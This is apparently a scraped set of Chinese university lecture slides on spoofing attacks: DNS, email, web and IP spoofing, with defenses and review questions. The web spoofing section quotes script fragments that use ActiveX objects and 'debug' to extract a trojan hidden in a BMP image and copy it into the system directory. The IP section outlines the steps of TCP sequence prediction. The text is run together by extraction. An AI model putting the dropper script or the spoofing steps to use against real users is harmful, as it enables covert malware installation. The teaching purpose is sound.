网络安全之欺骗攻击

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

网络安全第6章程序攻击重点回顾逻辑炸弹攻击植入后门病毒攻击特洛伊木马攻击其它程序攻击第7章欺骗攻击欺骗攻击是网络攻击的一种重要手段。常见的欺骗攻击方式有:DNS欺骗攻击;Email欺骗攻击;Web欺骗攻击和IP欺骗攻击等。本章介绍这些主要欺骗攻击的原理、实现技术。第7章欺骗攻击7.1DNS欺骗攻击7.2Email欺骗攻击7.3Web欺骗攻击7.4IP欺骗攻击DNS欺骗攻击DNS原理12.172.194.174202.103.0.117202.103.24.68207.171.163.31欺骗攻击DNS欺骗原理假设当提交给某个域名服务器的域名解析请求的数据包被截获,然后按截获者的意图将一个虚假的IP地址作为应答信息返回给请求者,这时,原始请求者就会把这个虚假的IP地址作为它所要请求的域名而进行连接,显然它被欺骗到了别处而根本连接不上自己想要连接的那个域名对那个客户想要连接的域名而言,它就算是被黑掉了,因为客户由于无法得到它的正确的IP地址而无法连接上它第7章第1节DNS欺骗攻击DNS欺骗12.172.194.174202.103.0.117207.245.113.7202.103.24.68207.171.163.31欺骗攻击Email欺骗方法攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序第7章第2节Email欺骗攻击Email欺骗实现步骤SMTP服务器允许匿名登录填写假的名称和发信人地址使用web形式骗取密码,或者使用附件植入木马第7章第2节Email欺骗攻击Email欺骗的防护查看邮件原文,检查真正的发件服务器地址通过邮件链接网页的时候,注意真正的网站地址在不同的应用中,尽可能使用不相同的、无关的密码第7章第2节Web欺骗攻击Web欺骗攻击原理攻击者通过伪造某个站点的影像拷贝,使该Web的入口进入到攻击者的Web影像服务器,并经过攻击者机器的过滤作用,从而达到攻击者监控受攻击者的任何活动以获取有用信息的目的第7章第3节Web欺骗攻击Web欺骗方法改写URLWeb中的脚本第7章第3节Web欺骗攻击改写URL①emailwithhtmllinksseemslikeMicrosoft①②②://③③④④htmlpagewithlinkslike:⑤⑤htmlpagewithlinkslike:://g.microsoft.com第7章第3节Web欺骗攻击利用Web脚本进行欺骗原理攻击者设计一个网页,并诱使受害者浏览该网页该网页中包含有一个图片和一个脚本当浏览时,该图片被下载到受害者计算机的临时目录中,而脚本被运行脚本的功能是将图片中隐藏的木马提取出来,并设置为自动执行第7章第3节Web欺骗攻击利用Web脚本进行欺骗基本控件a1=document.applets[0];a1.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B});a1.createInstance();reg=a1.GetObject();a1.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228});a1.createInstance();FSO=a1.GetObject();第7章第3节7.3Web欺骗攻击Web脚本从BMP图片中释放程序setLt=FSO.CreateTextFile(path&tmp.in)Lt.WriteLine(rbx)Lt.WriteLine(0)Lt.WriteLine(rcx)Lt.WriteLine(1000)Lt.WriteLine(w136)Lt.WriteLine(q)Lt.CloseWeb欺骗攻击Web脚本从BMP图片中释放程序WSH.Runcommand/cdebug&path&tmp.dat&path&tmp.in&path&tmp.out,false,6OnErrorResumeNextFSO.GetFile(path&tmp.dat).Copy(winsys&tmp.exe)FSO.GetFile(path&tmp.dat).DeleteFSO.GetFile(path&tmp.in).DeleteFSO.GetFile(path&tmp.out).Delete第7章第3节Web欺骗攻击Web欺骗的防护很隐蔽,不容易被发现预防手段禁止浏览器中的JavaScript功能确保浏览器的连接状态是可见的时刻注意所点击的URL链接会在位置状态行中得到正确的显示第7章第3节IP欺骗攻击IP欺骗的基础通过伪造IP地址能够获得更过的收益或者权限伪造的IP地址可以被接受而不被发现第7章第4节IP欺骗攻击IP欺骗的过程信任SYNxSYNy+ACKx+1ACKy+1第7章第4节IP欺骗攻击IP欺骗的过程首先使被信任主机的网络暂时瘫痪连接到目标机的某个端口来猜测ISN基值和增加规律把源址址伪装成被信任主机,发送带有SYN标志的数据段请求连接等待目标机发送SYN+ACK包给已经瘫痪的主机再次伪装成被信任主机向目标机发送的ACK,此时发送的数据段带有预测的目标机的ISN+1连接建立,发送命令请求第7章第4节IP欺骗攻击IP欺骗的预防删除/etc/hosts.equiv,$HOME/.rhosts修改/etc/inetd.conf文件,使得RPC机制无法运作设置路由器,过滤来自外部而信源地址却是内部IP的报文修改TCP的ISN变化规律,使得攻击者难以预测第7章第4节第7章欺骗攻击DNS欺骗攻击Email欺骗攻击Web欺骗攻击IP欺骗攻击第7章小结第7章欺骗攻击课后习题请简述DNS的工作原理,并指出在整个DNS解析过程中,可能存在的被欺骗攻击的地方。假如你的主机正在面临DNS欺骗攻击,你打算采取什么解决策略和方案?Web欺骗攻击有哪些具体形式?请简述其原理。假如你负责开发、维护和管理某商业网站,面对潜在的Web欺骗攻击,你将采取哪些手段避免你的网站受到攻击?第7章习题

1 / 24
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功